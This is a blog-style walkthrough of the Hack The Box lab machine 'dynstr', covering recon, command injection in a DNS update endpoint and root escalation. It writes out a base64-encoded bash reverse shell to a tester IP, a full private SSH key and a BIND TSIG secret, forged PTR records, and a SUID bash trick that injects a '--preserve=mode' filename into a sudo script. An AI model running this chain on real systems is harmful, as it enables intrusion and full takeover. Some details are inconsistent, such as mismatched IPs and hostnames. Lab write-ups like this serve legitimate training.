Hackthebox- dynstr walkthrough

Recon

$ nmap -vvv -p 22,53,80 -A -v -oN intial.nmap 10.129.157.100

Nmap scan report for dynstr.htb (0.129.157.100)

Host is up, received syn-ack (0.16s latency).

Scanned at 2021-06-13 04:53:51 BST for 16s

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 05:7c:5e:b1:83:f9:4f:ae:2f:08:e1:33:ff:f5:83:9e (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC//sbOTQwLRH4CGj3riDnnTvTCiJT1Uz7CyRSD2Tkh2wkT20rtAq13c5M1LC2kxki2bz9Ptxxx340Cc9tAcQaPZbmHndQe/H1bGiVZCKjOl2WqWQTV9fq6GGtflC94BkkLrmkWHzqg+S50g2Zg0iesPMkKAmwqwEVZx9npe1QuF3RQu5EYQXRYVOzpqQdU+jRD267gCvsKp9xmr7trZ1UzFxfBUOzSCWa3Adm2TTFwiA5jTb6x0lKVnQtgKghioMQeXXPuiTLCbI0XfbksoRI2OBAvTZf7RsIthKCiyCQRWjVh5Idr5Fh7GgwYaDgW662W3V3hCNEQRY8R9/fXWdVho1gWbm6NFt+NyRO/6F2XDvPseBYr+Yi6zwGEM+PpsTi5dfj8yYKRZ3HFXwjeBGjCPMRe9XPpCvvDnHAF18B1INVJPSwAIVll365V5D18JslQh7PpAWxO70TzmEC9E+UPXOrt29tZ0Zi/uApFRM700pdOhnvcs8q4RBWaUpp3ZB0=

| 256 3f:73:b4:95:72:ca:5e:33:f6:8a:8f:46:cf:43:35:b9 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFtYzp8umMbm7o9+1LUTVio/dduowE/AsA3rO52A5Q/Cuct9GY6IZEvPE+/XpEiNCPMSl991kjHT+WaAunmTbT4=

| 256 cc:0a:41:b7:a1:9a:43:da:1b:68:f5:2a:f8:2a:75:2c (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOz8b9MDlSPP5QJgSHy6fpG98bdKCgvqhuu07v5NFkdx

53/tcp open domain syn-ack ISC BIND 9.16.1 (Ubuntu Linux)

| dns-nsid:

|_ bind.version: 9.16.1-Ubuntu

80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))

| http-methods:

|_ Supported Methods: GET POST OPTIONS HEAD

|_http-server-header: Apache/2.4.41 (Ubuntu)

|_http-title: Dyna DNS

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sun Jun 13 04:54:07 2021 -- 1 IP address (1 host up) scanned in 18.86 seconds.

-------------------------------------------------------------------------------------------------------------

Enumeration:

lets add these domain into linux hosts

$ sudo echo "10.10.10.244  dynamicdns.htb no-ip.htb dynstr.htb beta.dyna.htb" >> /etc/hosts

after these we can find nothing here do lets try to look at the directries.

$ $ ffuf -u http://dyna.htb/nic/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 -c

/'___\ /'___\ /'___\

/\ \__/ /\ \__/ __ __ /\ \__/

\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\

\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/

\ \_\ \ \_\ \ \____/ \ \_\

\/_/ \/_/ \/___/ \/_/

v1.3.0 Kali Exclusive <3

________________________________________________

:: Method : GET

:: URL : http://dyna.htb/nic/FUZZ

:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt

:: Follow redirects : false

:: Calibration : false

:: Timeout : 10

:: Threads : 200

:: Matcher : Response status: 200,204,301,302,307,401,403,405

________________________________________________

.htaccess [Status: 403, Size: 273, Words: 20, Lines: 10]

.htpasswd [Status: 403, Size: 273, Words: 20, Lines: 10]

update [Status: 200, Size: 8, Words: 1, Lines: 2]

:: Progress: [20469/20469] :: Job [1/1] :: 982 req/sec :: Duration: [0:00:38] :: Errors: 3 ::

1:we can see there is an update directory so going through these we can find badauth.

2: from the webpage we can see the beta version of the website and giving the credentials.

Username: dynadbs

Password: sndanyd

After these lets go through the dynstr.htb/nic/update and intercept the request on burp and save it as res.txt

save the request and use these python script

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

#!/usr/bin/python3

import requests

from requests.auth import HTTPBasicAuth

url = 'http://dyna.htb/nic/update'

res = requests.get(url, verify=False, auth=HTTPBasicAuth('dynadns', 'sndanyd'))

print (res.text)

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

res.txt include your burp request.

$ chmod +x script.py

$./script.py

nochg 10.10.16.104

help : https://help.dyn.com/remote-access-api/return-codes/

$curl  "http://beta.dyna.htb/nic/update?myip=10.129.157.100&hostname=beta.dynamicdns.htb&systsm=id" -H "Authorization: Basic ZHluYWRuczpzbmRhbnlk"

output : good 10.129.157.100

$ echo "bash -i &>/dev/tcp/10.10.16.104/8443 <&1" |base64                                       

output: YmFzaCAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXzIDwmMQo=

Now again intercept the request and sent it to the repeater and change it request.

GET /nic/update?hostname=`echo+"YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjEwLjE2LjEwNC84NDQzIDwmMQo="+|+base64+-d|+bash`"dynadns.no-ip.htb&myip=10.10.16.104&offline=YES HTTP/1.1

Host: dynstr.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Authorization: Basic ZHluYWRuczpzbmRhbnlk

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Meanwhile start your netcat listners.

$nc -lvp 8443

when you will get the response like

HTTP/1.1 200 OK

Date: Sun, 13 Jun 2021 15:17:48 GMT

Server: Apache/2.4.41 (Ubuntu)

Vary: Accept-Encoding

Content-Length: 82

Connection: close

Content-Type: text/html; charset=UTF-8

server 127.0.0.1

zone no-ip.htb

update delete dynadns.no-ip.htb

good 10.10.16.104

netcat have a remote connection on terminal

www-data@dynstr:/var/www/html/nic$ cat user.txt

but here we don't have permission so lets move to the another way.

www-data@dynstr: cd /home/bindmgr
www-data@bindmgr:ls -al

total 436

drwxr-xr-x 2 bindmgr bindmgr 4096 Mar 13 14:53 .

drwxr-xr-x 5 bindmgr bindmgr 4096 Mar 15 20:39 ..

-rw-r--r-- 1 bindmgr bindmgr 237141 Mar 13 14:53 C62796521-debugging.script

-rw-r--r-- 1 bindmgr bindmgr 29312 Mar 13 14:53 C62796521-debugging.timing

-rw-r--r-- 1 bindmgr bindmgr 1175 Mar 13 14:53 command-output-C62796521.txt

-rw-r--r-- 1 bindmgr bindmgr 163048 Mar 13 14:52 strace-C62796521.txt

check these files anf you will get a private id_rsa key

help: https://kb.iu.edu/d/aews

-----BEGIN OPENSSH PRIVATE KEY-----

b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn

NhAAAAAwEAAQAAAQEAxeKZHOy+RGhs+gnMEgsdQas7klAb37HhVANJgY7EoewTwmSCcsl1

42kuvUhxLultlMRCj1pnZY/1sJqTywPGalR7VXo+2l0Dwx3zx7kQFiPeQJwiOM8u/g8lV3

HjGnCvzI4UojALjCH3YPVuvuhF0yIPvJDessdot/D2VPJqS+TD/4NogynFeUrpIW5DSP+F

L6oXil+sOM5ziRJQl/gKCWWDtUHHYwcsJpXotHxr5PibU8EgaKD6/heZXsD3Gn1VysNZdn

UOLzjapbDdRHKRJDftvJ3ZXJYL5vtupoZuzTTD1VrOMng13Q5T90kndcpyhCQ50IW4XNbX

CUjxJ+1jgwAAA8g3MHb+NzB2/gAAAAdzc2gtcnNhAAABAQDF4pkc7L5EaGz6CcwSCx1Bqz

uSUBvfseFUA0mBjsSh7BPCZIJyyXXjaS69SHEu6W2UxEKPWmdlj/WwmpPLA8ZqVHtVej7a

XQPDHfPHuRAWI95AnCI4zy7+DyVXceMacK/MjhSiMAuMIfdg9W6+6EXTIg+8kN6yx2i38P

ZU8mpL5MP/g2iDKcV5SukhbkNI/4UvqheKX6w4znOJElCX+AoJZYO1QcdjBywmlei0fGvk

+JtTwSBooPr+F5lewPcafVXKw1l2dQ4vONqlsN1EcpEkN+28ndlclgvm+26mhm7NNMPVWs

4yeDXdDlP3SSd1ynKEJDnQhbhc1tcJSPEn7WODAAAAAwEAAQAAAQEAmg1KPaZgiUjybcVq

xTE52YHAoqsSyBbm4Eye0OmgUp5C07cDhvEngZ7E8D6RPoAi+wm+93Ldw8dK8e2k2QtbUD

PswCKnA8AdyaxruDRuPY422/2w9qD0aHzKCUV0E4VeltSVY54bn0BiIW1whda1ZSTDM31k

obFz6J8CZidCcUmLuOmnNwZI4A0Va0g9kO54leWkhnbZGYshBhLx1LMixw5Oc3adx3Aj2l

u291/oBdcnXeaqhiOo5sQ/4wM1h8NQliFRXraymkOV7qkNPPPMPknIAVMQ3KHCJBM0XqtS

TbCX2irUtaW+Ca6ky54TIyaWNIwZNznoMeLpINn7nUXbgQAAAIB+QqeQO7A3KHtYtTtr6A

Tyk6sAVDCvrVoIhwdAHMXV6cB/Rxu7mPXs8mbCIyiLYveMD3KT7ccMVWnnzMmcpo2vceuE

BNS+0zkLxL7+vWkdWp/A4EWQgI0gyVh5xWIS0ETBAhwz6RUW5cVkIq6huPqrLhSAkz+dMv

C79o7j32R2KQAAAIEA8QK44BP50YoWVVmfjvDrdxIRqbnnSNFilg30KAd1iPSaEG/XQZyX

Wv//+lBBeJ9YHlHLczZgfxR6mp4us5BXBUo3Q7bv/djJhcsnWnQA9y9I3V9jyHniK4KvDt

U96sHx5/UyZSKSPIZ8sjXtuPZUyppMJVynbN/qFWEDNAxholEAAACBANIxP6oCTAg2yYiZ

b6Vity5Y2kSwcNgNV/E5bVE1i48E7vzYkW7iZ8/5Xm3xyykIQVkJMef6mveI972qx3z8m5

rlfhko8zl6OtNtayoxUbQJvKKaTmLvfpho2PyE4E34BN+OBAIOvfRxnt2x2SjtW3ojCJoG

jGPLYph+aOFCJ3+TAAAADWJpbmRtZ3JAbm9tZW4BAgMEBQ==

-----END OPENSSH PRIVATE KEY-----

save the file into your .ssh directory on your local machine.

.ssh$ echo "paste the above key" > id_rsa

.ssh$ chmod 700 id_rsa

strace-C62796521.txt

So now we have the private key now we can start working on the DNS condition part for SSH login.

Exploitation:

As we know that PTR records provides the domain name associated with an IP so we have to add PTR record that matches the above regex that is pointing to our IP.

First of all to edit the records for infra we have to get the key for infra so let's get it by going to /etc/bind/infra.key

```bash

cat /etc/bind/infra.key

key "infra-key" {

algorithm hmac-sha256;

secret "7qHH/eYXorN2ZNUM1dpLie5BmVstOw55LgEeacJZsao=";

};

```

Now that we have the key we can bind out record into DNS so let's try that.

First we have to load up the nslookup console and import the keyfile.

go to the terminal

www-data@bindmgr$nsupdate -k /etc/bind/infra.key
update add api.infra.dyna.htb 86400 A 10.10.16.104

update add 104.16.10.10.in-addr.arpa 86400 PTR api.infra.dyna.htb
show
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id:      0
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; UPDATE SECTION:
104.16.10.10.in-addr.arpa. 86400 IN      PTR     api.infra.dyna.htb.
send
quit

again back to the your local terminal and connect the rsa key

$ssh -i id_rsa bindmgr@dyna.htb
bindmgr@dynstr:~$ 

And we are bindmgr let's get root now.

bindmgr@dynstr:~$sudo -l

sudo: unable to resolve host dynstr.dyna.htb: Name or service not known

Matching Defaults entries for bindmgr on dynstr:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bindmgr may run the following commands on dynstr:

(ALL) NOPASSWD: /usr/local/bin/bindmgr.sh

the script looks like ;

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

#!/usr/bin/bash

# This script generates named.conf.bindmgr to workaround the problem

# that bind/named can only include single files but no directories.

#

# It creates a named.conf.bindmgr file in /etc/bind that can be included

# from named.conf.local (or others) and will include all files from the

# directory /etc/bin/named.bindmgr.

#

# NOTE: The script is work in progress. For now bind is not including

#named.conf.bindmgr.

#

# TODO: Currently the script is only adding files to the directory but

#not deleting them. As we generate the list of files to be included

#from the source directory they won't be included anyway.

BINDMGR_CONF=/etc/bind/named.conf.bindmgr

BINDMGR_DIR=/etc/bind/named.bindmgr

indent() { sed 's/^/ /'; }

# Check versioning (.version)

echo "[+] Running $0 to stage new configuration from $PWD."

if [[ ! -f .version ]] ; then

echo "[-] ERROR: Check versioning. Exiting."

exit 42

fi

if [[ "`cat .version 2>/dev/null`" -le "`cat $BINDMGR_DIR/.version 2>/dev/null`" ]] ; then [0/598]

echo "[-] ERROR: Check versioning. Exiting."

exit 43

fi

# Create config file that includes all files from named.bindmgr.

echo "[+] Creating $BINDMGR_CONF file."

printf '// Automatically generated file. Do not modify manually.\n' > $BINDMGR_CONF

for file in * ; do

printf 'include "/etc/bind/named.bindmgr/%s";\n' "$file" >> $BINDMGR_CONF

done

# Stage new version of configuration files.

echo "[+] Staging files to $BINDMGR_DIR."

cp .version * /etc/bind/named.bindmgr/

# Check generated configuration with named-checkconf.

echo "[+] Checking staged configuration."

named-checkconf $BINDMGR_CONF >/dev/null

if [[ $? -ne 0 ]] ; then

echo "[-] ERROR: The generated configuration is not valid. Please fix following errors: "

named-checkconf $BINDMGR_CONF 2>&1 | indent

exit 44

else

echo "[+] Configuration successfully staged."

# *** TODO *** Uncomment restart once we are live.

# systemctl restart bind9

if [[ $? -ne 0 ]] ; then

echo "[-] Restart of bind9 via systemctl failed. Please check logfile: "

systemctl status bind9

else

echo "[+] Restart of bind9 via systemctl succeeded."

fi

fi

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

bindmgr@dynstr:~$cd /dev/shm
bindmgr@dynstr:/dev/shm$echo "2" > .version
bindmgr@dynstr:/dev/shm$cp /bin/bash .
bindmgr@dynstr:/dev/shm$chmod +s bash
bindmgr@dynstr:/dev/shm$echo > --preserve=mode
bindmgr@dynstr:/dev/shm$ls -al

total 1164
drwxrwxrwt  2 root    root        100 Jun 13 19:22  .
drwxr-xr-x 17 root    root       3960 Jun 13 15:38  ..
-rwsr-sr-x  1 bindmgr bindmgr 1183448 Jun 13 19:20  bash
-rw-rw-r--  1 bindmgr bindmgr       1 Jun 13 19:22 '--preserve=mode'
-rw-rw-r--  1 bindmgr bindmgr       1 Jun 13 19:22 '--preserve=mode'

bindmgr@dynstr:/dev/shm$ sudo /usr/local/bin/bindmgr.sh 

sudo: unable to resolve host dynstr.dyna.htb: Name or service not known

[+] Running /usr/local/bin/bindmgr.sh to stage new configuration from /dev/shm.

[+] Creating /etc/bind/named.conf.bindmgr file.

[+] Staging files to /etc/bind/named.bindmgr.

[+] Checking staged configuration.

[-] ERROR: The generated configuration is not valid. Please fix following errors:

/etc/bind/named.bindmgr/bash:1: unknown option 'ELF...'

/etc/bind/named.bindmgr/bash:14: unknown option 'hȀE'

/etc/bind/named.bindmgr/bash:40: unknown option 'YF'

/etc/bind/named.bindmgr/bash:40: unexpected token near '}'

bindmgr@dynstr:/dev/shm$ ls	

bash '--preserve=mode'

bindmgr@dynstr:/dev/shm$ ls -al

total 1164

drwxrwxrwt 2 root root 100 Jun 13 19:22 .

drwxr-xr-x 17 root root 3960 Jun 13 15:38 ..

-rwsr-sr-x 1 bindmgr bindmgr 1183448 Jun 13 19:20 bash

-rw-rw-r-- 1 bindmgr bindmgr 1 Jun 13 19:22 '--preserve=mode'

-rw-rw-r-- 1 bindmgr bindmgr 2 Jun 13 19:17 .version

Now let's run the bash as the privileged as root.

bindmgr@dynstr:/dev/shm$ /etc/bind/named.bindmgr/bash -p 

bash-5.0# id

bash-5.0# cd .

thanks for learning (any doubt message me on twitter)

Twitter: https://twitter.com/theblackthreat

Youtube: https://youtube.com/c/theblackthreat

get a rough file